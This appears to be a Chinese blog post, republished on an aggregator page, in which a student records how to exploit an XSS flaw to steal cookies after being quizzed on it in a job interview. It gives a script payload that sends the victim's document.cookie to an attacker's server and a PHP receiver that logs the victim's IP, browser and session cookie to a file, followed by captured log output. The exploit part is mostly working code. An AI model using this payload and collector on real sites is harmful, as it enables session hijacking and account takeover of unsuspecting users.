利用XSS来将cookie传送指定文件中
来源:互联网 发布:cf36 2检测到数据异常 编辑:程序博客网 时间:2024/06/06 02:35
题目可以说是很直白了,为什么突然写这个,还来源于前几天的面试,今年的校招因为一些公司的缩招,可以说是泥潭之争了,当然了,被面试官蹂躏也是自身水平和能力的限制,没有任何怨言。在面试官让我手写xss利用代码的时候,我才发现,因为一直以来的乙方的惯性思维,在漏洞利用和脚本上自己的实践太少了,但是还好,我还有很长很长的时间,可以努力。
在存在XSS漏洞的输入框中输入(IP地址为测试内网地址):
<script>document.location=http://10.170.61.174/1.php?cookie=document.cookie</script>
这里可以用document.location或者window.open, <script src="">来调用。但是调用后都会导致跳转,不知道还有什么其他好用的调用方法。突然想起来beEF,一次访问就可以hook,真的强。
1.php如下,放在web服务器的根目录:
<?php$ip=$_SERVER['REMOTE_ADDR'];//$referer=$_SERVER['HTTP_REFERER'];$agent=$_SERVER['HTTP_USER_AGENT'];$cookie = $_GET['cookie'];$data = $ip."\n User-Agent:".$agent."\n Session:".$cookie."\n";$file = fopen('cookie.html','a');fwrite($file,htmlspecialchars($data));fclose($file);?>
cookie.html收到信息如下:
10.170.61.174 User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Session:so_value=|<script>document.location=http://10.170.61.174/1.php?cookie=1</script>||<script>document.location=http://10.170.61.174/1.php?cookie=document.cookie</script>||<script>document.location="http://10.170.61.174/1.php?cookie="+document.cookie</script>|
阅读全文
0 0
- 利用XSS来将cookie传送指定文件中
- 利用蓝牙来传送图片等文件
- 利用XSS盗取cookie
- 利用XSS获取cookie
- 利用slf4j+log4j将日志写入指定的文件中
- 利用xss偷cookie教学
- XSS获取cookie并利用
- XSS获取cookie并利用
- 利用ssh传送文件
- 利用SSH传送文件
- 利用servlet来上传文件,并且将文件中数据倒入oracle数据库
- 利用XSS窃取cookie的php脚本
- 利用HTTP-only Cookie缓解XSS
- 利用xss漏洞窃取cookie登录
- 利用存储过程读指定文件夹里所有txt文件,将数据插入数据库中
- C++利用SOCKET传送文件
- C++利用SOCKET传送文件
- C++利用SOCKET传送文件
- Spring Security教程(13)---- 验证码功能的实现
- MySQL5.7.19免安装版的安装与卸载重装
- 递归实现全排列问题
- 责任链模式
- Lostash event API详解
- 利用XSS来将cookie传送指定文件中
- 计算机网络之面试常考
- Python+Unittest+自动化:使用Python进行单元测试
- MapReduce:超大机群上的简单数据处理
- 从鼓吹Linux转向科普无穷小微积分的道路
- 实现黑客帝国中的字符雨
- STL-foreach算法
- 第三周第一节
- 考研数学